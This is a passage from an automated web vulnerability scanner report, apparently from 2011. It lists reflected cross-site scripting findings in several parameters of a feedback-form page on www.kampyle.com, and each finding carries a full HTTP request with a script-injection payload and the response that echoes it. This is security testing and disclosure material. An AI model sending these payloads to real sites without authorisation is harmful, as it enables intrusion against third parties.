<em>426d8<img src=a onerror=alert(1)>31b7c6065d67ada9d</em>
...[SNIP]...
4.344. http://www.kampyle.com/feedback_form/ff-feedback-form.php [amp;form_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kampyle.com
Path:   /feedback_form/ff-feedback-form.php

Issue detail

The value of the amp;form_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4606f"><script>alert(1)</script>9da7c5a4fc6 was submitted in the amp;form_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feedback_form/ff-feedback-form.php?site_code=6941152&amp;lang=en&amp;form_id=560154606f"><script>alert(1)</script>9da7c5a4fc6&time_on_site=10&stats=k_button_js_revision%3D15643&url=http%3A%2F%2Fwww.local.com%2F&utmz=177062200.1316295499.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName&utma=177062200.605228499.1316295499.1316295499.1316295499.1&utmv=null HTTP/1.1
Host: www.kampyle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:58:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: FF_referrer_url=aHR0cDovL3d3dy5rYW1weWxlLmNvbS9mZWVkYmFja19mb3JtL2ZmLWZlZWRiYWNrLWZvcm0ucGhwP3NpdGVfY29kZT02OTQxMTUyJmFtcDtsYW5nPWVuJmFtcDtmb3JtX2lkPTU2MDE1NDYwNmYiPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD45ZGE3YzVhNGZjNiZ0aW1lX29uX3NpdGU9MTAmc3RhdHM9a19idXR0b25fanNfcmV2aXNpb24lM0QxNTY0MyZ1cmw9aHR0cCUzQSUyRiUyRnd3dy5sb2NhbC5jb20lMkYmdXRtej0xNzcwNjIyMDAuMTMxNjI5NTQ5OS4xLjEudXRtY3NyJTNEZmFrZXJlZmVycmVyZG9taW5hdG9yLmNvbSU3Q3V0bWNjbiUzRChyZWZlcnJhbCklN0N1dG1jbWQlM0RyZWZlcnJhbCU3Q3V0bWNjdCUzRCUyRnJlZmVycmVyUGF0aE5hbWUmdXRtYT0xNzcwNjIyMDAuNjA1MjI4NDk5LjEzMTYyOTU0OTkuMTMxNjI5NTQ5OS4xMzE2Mjk1NDk5LjEmdXRtdj1udWxs; expires=Sat, 17-Sep-2011 17:58:48 GMT; path=/
Set-Cookie: FF_caller_url=aHR0cDovL3d3dy5sb2NhbC5jb20v; expires=Sat, 17-Sep-2011 17:58:48 GMT; path=/
Vary: Accept-Encoding
Content-Length: 17904
Content-Type: text/html; charset=UTF-8

<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<
...[SNIP]...
onclick="if (FFGlobalData() == true) {
           javascript:setSend();LoadContentById('form-loader', '/feedback_form/view/classic/ff-sign-in.php','aaa&email_r=0&site_code=6941152&amp;lang=en&amp;form_id=560154606f"><script>alert(1)</script>9da7c5a4fc6&time_on_site=10&stats=k_button_js_revision%3D15643&url=http%3A%2F%2Fwww.local.com%2F&utmz=177062200.1316295499.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct
...[SNIP]...
4.345. http://www.kampyle.com/feedback_form/ff-feedback-form.php [amp;lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kampyle.com
Path:   /feedback_form/ff-feedback-form.php

Issue detail

The value of the amp;lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78585"><script>alert(1)</script>6fb9591fc7e was submitted in the amp;lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feedback_form/ff-feedback-form.php?site_code=6941152&amp;lang=en78585"><script>alert(1)</script>6fb9591fc7e&amp;form_id=56015&time_on_site=10&stats=k_button_js_revision%3D15643&url=http%3A%2F%2Fwww.local.com%2F&utmz=177062200.1316295499.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName&utma=177062200.605228499.1316295499.1316295499.1316295499.1&utmv=null HTTP/1.1
Host: www.kampyle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:58:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: FF_referrer_url=aHR0cDovL3d3dy5rYW1weWxlLmNvbS9mZWVkYmFja19mb3JtL2ZmLWZlZWRiYWNrLWZvcm0ucGhwP3NpdGVfY29kZT02OTQxMTUyJmFtcDtsYW5nPWVuNzg1ODUiPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD42ZmI5NTkxZmM3ZSZhbXA7Zm9ybV9pZD01NjAxNSZ0aW1lX29uX3NpdGU9MTAmc3RhdHM9a19idXR0b25fanNfcmV2aXNpb24lM0QxNTY0MyZ1cmw9aHR0cCUzQSUyRiUyRnd3dy5sb2NhbC5jb20lMkYmdXRtej0xNzcwNjIyMDAuMTMxNjI5NTQ5OS4xLjEudXRtY3NyJTNEZmFrZXJlZmVycmVyZG9taW5hdG9yLmNvbSU3Q3V0bWNjbiUzRChyZWZlcnJhbCklN0N1dG1jbWQlM0RyZWZlcnJhbCU3Q3V0bWNjdCUzRCUyRnJlZmVycmVyUGF0aE5hbWUmdXRtYT0xNzcwNjIyMDAuNjA1MjI4NDk5LjEzMTYyOTU0OTkuMTMxNjI5NTQ5OS4xMzE2Mjk1NDk5LjEmdXRtdj1udWxs; expires=Sat, 17-Sep-2011 17:58:33 GMT; path=/
Set-Cookie: FF_caller_url=aHR0cDovL3d3dy5sb2NhbC5jb20v; expires=Sat, 17-Sep-2011 17:58:33 GMT; path=/
Vary: Accept-Encoding
Content-Length: 17904
Content-Type: text/html; charset=UTF-8

<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<
...[SNIP]...
boldbuttons send" onclick="if (FFGlobalData() == true) {
           javascript:setSend();LoadContentById('form-loader', '/feedback_form/view/classic/ff-sign-in.php','aaa&email_r=0&site_code=6941152&amp;lang=en78585"><script>alert(1)</script>6fb9591fc7e&amp;form_id=56015&time_on_site=10&stats=k_button_js_revision%3D15643&url=http%3A%2F%2Fwww.local.com%2F&utmz=177062200.1316295499.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D(referral)%7Cutmcmd%3
...[SNIP]...
4.346. http://www.kampyle.com/feedback_form/ff-feedback-form.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kampyle.com
Path:   /feedback_form/ff-feedback-form.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd18d"><script>alert(1)</script>6674ec9d476 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feedback_form/ff-feedback-form.php?site_code=6941152&amp;lang=en&amp;form_id=56015&time_on_site=10&stats=k_button_js_revision%3D15643&url=http%3A%2F%2Fwww.local.com%2F&utmz=177062200.1316295499.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName&utma=177062200.605228499.1316295499.1316295499.1316295499.1&utmv=null&fd18d"><script>alert(1)</script>6674ec9d476=1 HTTP/1.1
Host: www.kampyle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:01:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: FF_referrer_url=aHR0cDovL3d3dy5rYW1weWxlLmNvbS9mZWVkYmFja19mb3JtL2ZmLWZlZWRiYWNrLWZvcm0ucGhwP3NpdGVfY29kZT02OTQxMTUyJmFtcDtsYW5nPWVuJmFtcDtmb3JtX2lkPTU2MDE1JnRpbWVfb25fc2l0ZT0xMCZzdGF0cz1rX2J1dHRvbl9qc19yZXZpc2lvbiUzRDE1NjQzJnVybD1odHRwJTNBJTJGJTJGd3d3LmxvY2FsLmNvbSUyRiZ1dG16PTE3NzA2MjIwMC4xMzE2Mjk1NDk5LjEuMS51dG1jc3IlM0RmYWtlcmVmZXJyZXJkb21pbmF0b3IuY29tJTdDdXRtY2NuJTNEKHJlZmVycmFsKSU3Q3V0bWNtZCUzRHJlZmVycmFsJTdDdXRtY2N0JTNEJTJGcmVmZXJyZXJQYXRoTmFtZSZ1dG1hPTE3NzA2MjIwMC42MDUyMjg0OTkuMTMxNjI5NTQ5OS4xMzE2Mjk1NDk5LjEzMTYyOTU0OTkuMSZ1dG12PW51bGwmZmQxOGQiPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD42Njc0ZWM5ZDQ3Nj0x; expires=Sat, 17-Sep-2011 18:01:35 GMT; path=/
Set-Cookie: FF_caller_url=aHR0cDovL3d3dy5sb2NhbC5jb20v; expires=Sat, 17-Sep-2011 18:01:35 GMT; path=/
Vary: Accept-Encoding
Content-Length: 17907
Content-Type: text/html; charset=UTF-8

<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<
...[SNIP]...
7062200.1316295499.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName&utma=177062200.605228499.1316295499.1316295499.1316295499.1&utmv=null&fd18d"><script>alert(1)</script>6674ec9d476=1');            }">
...[SNIP]...
4.347. http://www.kampyle.com/feedback_form/ff-feedback-form.php [stats parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kampyle.com
Path:   /feedback_form/ff-feedback-form.php

Issue detail

The value of the stats request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63ac1"><script>alert(1)</script>4e3c4c88cde was submitted in the stats parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feedback_form/ff-feedback-form.php?site_code=6941152&amp;lang=en&amp;form_id=56015&time_on_site=10&stats=k_button_js_revision%3D1564363ac1"><script>alert(1)</script>4e3c4c88cde&url=http%3A%2F%2Fwww.local.com%2F&utmz=177062200.1316295499.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName&utma=177062200.605228499.1316295499.1316295499.1316295499.1&utmv=null HTTP/1.1
Host: www.kampyle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:59:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: FF_referrer_url=aHR0cDovL3d3dy5rYW1weWxlLmNvbS9mZWVkYmFja19mb3JtL2ZmLWZlZWRiYWNrLWZvcm0ucGhwP3NpdGVfY29kZT02OTQxMTUyJmFtcDtsYW5nPWVuJmFtcDtmb3JtX2lkPTU2MDE1JnRpbWVfb25fc2l0ZT0xMCZzdGF0cz1rX2J1dHRvbl9qc19yZXZpc2lvbiUzRDE1NjQzNjNhYzEiPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD40ZTNjNGM4OGNkZSZ1cmw9aHR0cCUzQSUyRiUyRnd3dy5sb2NhbC5jb20lMkYmdXRtej0xNzcwNjIyMDAuMTMxNjI5NTQ5OS4xLjEudXRtY3NyJTNEZmFrZXJlZmVycmVyZG9taW5hdG9yLmNvbSU3Q3V0bWNjbiUzRChyZWZlcnJhbCklN0N1dG1jbWQlM0RyZWZlcnJhbCU3Q3V0bWNjdCUzRCUyRnJlZmVycmVyUGF0aE5hbWUmdXRtYT0xNzcwNjIyMDAuNjA1MjI4NDk5LjEzMTYyOTU0OTkuMTMxNjI5NTQ5OS4xMzE2Mjk1NDk5LjEmdXRtdj1udWxs; expires=Sat, 17-Sep-2011 17:59:33 GMT; path=/
Set-Cookie: FF_caller_url=aHR0cDovL3d3dy5sb2NhbC5jb20v; expires=Sat, 17-Sep-2011 17:59:33 GMT; path=/
Vary: Accept-Encoding
Content-Length: 17967
Content-Type: text/html; charset=UTF-8

<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<
...[SNIP]...
t:setSend();LoadContentById('form-loader', '/feedback_form/view/classic/ff-sign-in.php','aaa&email_r=0&site_code=6941152&amp;lang=en&amp;form_id=56015&time_on_site=10&stats=k_button_js_revision%3D1564363ac1"><script>alert(1)</script>4e3c4c88cde&url=http%3A%2F%2Fwww.local.com%2F&utmz=177062200.1316295499.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName&utma=177062200.605228499.131
...[SNIP]...
4.348. http://www.kampyle.com/feedback_form/ff-feedback-form.php [time_on_site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kampyle.com
Path:   /feedback_form/ff-feedback-form.php

Issue detail

The value of the time_on_site request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e5297%3balert(1)//e465ddcf7b0 was submitted in the time_on_site parameter. This input was echoed as e5297;alert(1)//e465ddcf7b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feedback_form/ff-feedback-form.php?site_code=6941152&amp;lang=en&amp;form_id=56015&time_on_site=10e5297%3balert(1)//e465ddcf7b0&stats=k_button_js_revision%3D15643&url=http%3A%2F%2Fwww.local.com%2F&utmz=177062200.1316295499.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName&utma=177062200.605228499.1316295499.1316295499.1316295499.1&utmv=null HTTP/1.1
Host: www.kampyle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:59:12 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: FF_referrer_url=aHR0cDovL3d3dy5rYW1weWxlLmNvbS9mZWVkYmFja19mb3JtL2ZmLWZlZWRiYWNrLWZvcm0ucGhwP3NpdGVfY29kZT02OTQxMTUyJmFtcDtsYW5nPWVuJmFtcDtmb3JtX2lkPTU2MDE1JnRpbWVfb25fc2l0ZT0xMGU1Mjk3JTNiYWxlcnQoMSkvL2U0NjVkZGNmN2IwJnN0YXRzPWtfYnV0dG9uX2pzX3JldmlzaW9uJTNEMTU2NDMmdXJsPWh0dHAlM0ElMkYlMkZ3d3cubG9jYWwuY29tJTJGJnV0bXo9MTc3MDYyMjAwLjEzMTYyOTU0OTkuMS4xLnV0bWNzciUzRGZha2VyZWZlcnJlcmRvbWluYXRvci5jb20lN0N1dG1jY24lM0QocmVmZXJyYWwpJTdDdXRtY21kJTNEcmVmZXJyYWwlN0N1dG1jY3QlM0QlMkZyZWZlcnJlclBhdGhOYW1lJnV0bWE9MTc3MDYyMjAwLjYwNTIyODQ5OS4xMzE2Mjk1NDk5LjEzMTYyOTU0OTkuMTMxNjI5NTQ5OS4xJnV0bXY9bnVsbA%3D%3D; expires=Sat, 17-Sep-2011 17:59:12 GMT; path=/
Set-Cookie: FF_caller_url=aHR0cDovL3d3dy5sb2NhbC5jb20v; expires=Sat, 17-Sep-2011 17:59:12 GMT; path=/
Vary: Accept-Encoding
Content-Length: 17917
Content-Type: text/html; charset=UTF-8

<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<
...[SNIP]...
   , '0' : 'Select a relevant issue'
   
   },
   'mood1' : 'Negative',
   'mood5' : 'Positive',
   'feedbackFormTextarea' : '',
   'multipleFeedback' : true};

function handleWindowChange(){
   
}
FFSetTimeOnSite(10e5297;alert(1)//e465ddcf7b0);

FFSetStats('k_button_js_revision=15643');
var type_0;
var type_1;
var type_2;
var type_3;
var type_4;
var type_5;
var array_fb_types = new Array ('Bug','Site content','Suggestion','Compliment','Oth
...[SNIP]...
4.349. http://www.kampyle.com/feedback_form/ff-feedback-form.php [time_on_site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kampyle.com
Path:   /feedback_form/ff-feedback-form.php

Issue detail

The value of the time_on_site request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload addd4"><script>alert(1)</script>38a63495a8a was submitted in the time_on_site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feedback_form/ff-feedback-form.php?site_code=6941152&amp;lang=en&amp;form_id=56015&time_on_site=10addd4"><script>alert(1)</script>38a63495a8a&stats=k_button_js_revision%3D15643&url=http%3A%2F%2Fwww.local.com%2F&utmz=177062200.1316295499.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName&utma=177062200.605228499.1316295499.1316295499.1316295499.1&utmv=null HTTP/1.1
Host: www.kampyle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:59:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: FF_referrer_url=aHR0cDovL3d3dy5rYW1weWxlLmNvbS9mZWVkYmFja19mb3JtL2ZmLWZlZWRiYWNrLWZvcm0ucGhwP3NpdGVfY29kZT02OTQxMTUyJmFtcDtsYW5nPWVuJmFtcDtmb3JtX2lkPTU2MDE1JnRpbWVfb25fc2l0ZT0xMGFkZGQ0Ij48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ%2BMzhhNjM0OTVhOGEmc3RhdHM9a19idXR0b25fanNfcmV2aXNpb24lM0QxNTY0MyZ1cmw9aHR0cCUzQSUyRiUyRnd3dy5sb2NhbC5jb20lMkYmdXRtej0xNzcwNjIyMDAuMTMxNjI5NTQ5OS4xLjEudXRtY3NyJTNEZmFrZXJlZmVycmVyZG9taW5hdG9yLmNvbSU3Q3V0bWNjbiUzRChyZWZlcnJhbCklN0N1dG1jbWQlM0RyZWZlcnJhbCU3Q3V0bWNjdCUzRCUyRnJlZmVycmVyUGF0aE5hbWUmdXRtYT0xNzcwNjIyMDAuNjA1MjI4NDk5LjEzMTYyOTU0OTkuMTMxNjI5NTQ5OS4xMzE2Mjk1NDk5LjEmdXRtdj1udWxs; expires=Sat, 17-Sep-2011 17:59:08 GMT; path=/
Set-Cookie: FF_caller_url=aHR0cDovL3d3dy5sb2NhbC5jb20v; expires=Sat, 17-Sep-2011 17:59:08 GMT; path=/
Vary: Accept-Encoding
Content-Length: 17967
Content-Type: text/html; charset=UTF-8

<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<
...[SNIP]...
lobalData() == true) {
           javascript:setSend();LoadContentById('form-loader', '/feedback_form/view/classic/ff-sign-in.php','aaa&email_r=0&site_code=6941152&amp;lang=en&amp;form_id=56015&time_on_site=10addd4"><script>alert(1)</script>38a63495a8a&stats=k_button_js_revision%3D15643&url=http%3A%2F%2Fwww.local.com%2F&utmz=177062200.1316295499.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPa
...[SNIP]...
4.350. http://www.kampyle.com/feedback_form/ff-feedback-form.php [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kampyle.com
Path:   /feedback_form/ff-feedback-form.php

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dd11"><script>alert(1)</script>271c0266be was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feedback_form/ff-feedback-form.php?site_code=6941152&amp;lang=en&amp;form_id=56015&time_on_site=10&stats=k_button_js_revision%3D15643&url=http%3A%2F%2Fwww.local.com%2F1dd11"><script>alert(1)</script>271c0266be&utmz=177062200.1316295499.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName&utma=177062200.605228499.1316295499.1316295499.1316295499.1&utmv=null HTTP/1.1
Host: www.kampyle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:00:10 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: FF_referrer_url=aHR0cDovL3d3dy5rYW1weWxlLmNvbS9mZWVkYmFja19mb3JtL2ZmLWZlZWRiYWNrLWZvcm0ucGhwP3NpdGVfY29kZT02OTQxMTUyJmFtcDtsYW5nPWVuJmFtcDtmb3JtX2lkPTU2MDE1JnRpbWVfb25fc2l0ZT0xMCZzdGF0cz1rX2J1dHRvbl9qc19yZXZpc2lvbiUzRDE1NjQzJnVybD1odHRwJTNBJTJGJTJGd3d3LmxvY2FsLmNvbSUyRjFkZDExIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ%2BMjcxYzAyNjZiZSZ1dG16PTE3NzA2MjIwMC4xMzE2Mjk1NDk5LjEuMS51dG1jc3IlM0RmYWtlcmVmZXJyZXJkb21pbmF0b3IuY29tJTdDdXRtY2NuJTNEKHJlZmVycmFsKSU3Q3V0bWNtZCUzRHJlZmVycmFsJTdDdXRtY2N0JTNEJTJGcmVmZXJyZXJQYXRoTmFtZSZ1dG1hPTE3NzA2MjIwMC42MDUyMjg0OTkuMTMxNjI5NTQ5OS4xMzE2Mjk1NDk5LjEzMTYyOTU0OTkuMSZ1dG12PW51bGw%3D; expires=Sat, 17-Sep-2011 18:00:10 GMT; path=/
Set-Cookie: FF_caller_url=aHR0cDovL3d3dy5sb2NhbC5jb20vMWRkMTEmcXVvdDsmZ3Q7Jmx0O3NjcmlwdCZndDthbGVydCgxKSZsdDsvc2NyaXB0Jmd0OzI3MWMwMjY2YmU%3D; expires=Sat, 17-Sep-2011 18:00:10 GMT; path=/
Vary: Accept-Encoding
Content-Length: 17965
Content-Type: text/html; charset=UTF-8

<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<
...[SNIP]...
loader', '/feedback_form/view/classic/ff-sign-in.php','aaa&email_r=0&site_code=6941152&amp;lang=en&amp;form_id=56015&time_on_site=10&stats=k_button_js_revision%3D15643&url=http%3A%2F%2Fwww.local.com%2F1dd11"><script>alert(1)</script>271c0266be&utmz=177062200.1316295499.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName&utma=177062200.605228499.1316295499.1316295499.1316295499.1&ut
...[SNIP]...
4.351. http://www.kampyle.com/feedback_form/ff-feedback-form.php [utma parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kampyle.com
Path:   /feedback_form/ff-feedback-form.php

Issue detail

The value of the utma request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fdaa"><script>alert(1)</script>21929253d65 was submitted in the utma parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feedback_form/ff-feedback-form.php?site_code=6941152&amp;lang=en&amp;form_id=56015&time_on_site=10&stats=k_button_js_revision%3D15643&url=http%3A%2F%2Fwww.local.com%2F&utmz=177062200.1316295499.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName&utma=177062200.605228499.1316295499.1316295499.1316295499.14fdaa"><script>alert(1)</script>21929253d65&utmv=null HTTP/1.1
Host: www.kampyle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:01:05 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
